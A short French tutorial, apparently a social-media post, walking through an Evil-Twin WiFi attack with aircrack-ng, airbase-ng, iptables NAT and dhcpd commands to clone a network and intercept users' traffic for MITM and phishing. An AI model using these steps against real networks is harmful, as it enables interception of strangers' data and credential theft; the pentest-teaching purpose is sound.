Résumé sur l'Attaque du Jumeau Malveillant (Evil-Twin) en Pentest WiFi
Qu'est-ce que le Hacking WiFi ?
Le hacking WiFi consiste à exploiter les vulnérabilités des réseaux sans fil pour accéder illégalement à un réseau WiFi ou compromettre la sécurité d'un réseau. Une des attaques courantes en pentest WiFi est l'attaque du jumeau malveillant (Evil-Twin attack), où un attaquant crée un point d'accès WiFi frauduleux pour tromper les utilisateurs.
Comment fonctionne l'attaque Evil-Twin ?
L'attaque du jumeau malveillant vise à inciter les utilisateurs à se connecter à un point d'accès WiFi frauduleux qui semble légitime, mais est contrôlé par l'attaquant. Voici les étapes avec des commandes à l'appui :
Étape 1 : Configuration de l'interface WiFi (exemple avec aircrack-ng)
# Activation de l'interface WiFi en mode monitor:
$ airmon-ng start wlan0
Étape 2 : Recherche de réseaux cibles (SSID):
# Scan des réseaux WiFi disponibles:
$ airodump-ng wlan0mon
Étape 3 : Création du point d'accès Evil-Twin:
# Création du point d'accès avec le même SSID que la cible:
$ airbase-ng -e NomDuRéseauCible -c CanalMoniteur wlan0mon
Étape 4 : Activation du routage et du partage de connexion
# Activation du routage IP
$ echo 1 > /proc/sys/net/ipv4/ip_forward
# Configuration des règles iptables pour le partage de connexion
$ iptables --table nat -A POSTROUTING -o Eth0 -j MASQUERADE
Étape 5 : Démarrage du serveur DHCP pour attribuer des adresses IP aux clients
# Démarrage du serveur DHCP
$ dhcpd wlan0mon
Étape 6 : L'attaque
Les utilisateurs à proximité recherchent le réseau WiFi légitime (par exemple, "NomDuRéseauCible") et se connectent automatiquement au point d'accès Evil-Twin créé par l'attaquant, pensant qu'il s'agit du réseau de confiance.
conclusion : Collecte de données
L'attaquant peut maintenant intercepter le trafic réseau, capturer des informations sensibles, effectuer des attaques de type Man-in-the-Middle (MITM), ouvrir des pages de phishing, etc..
☘️M-corp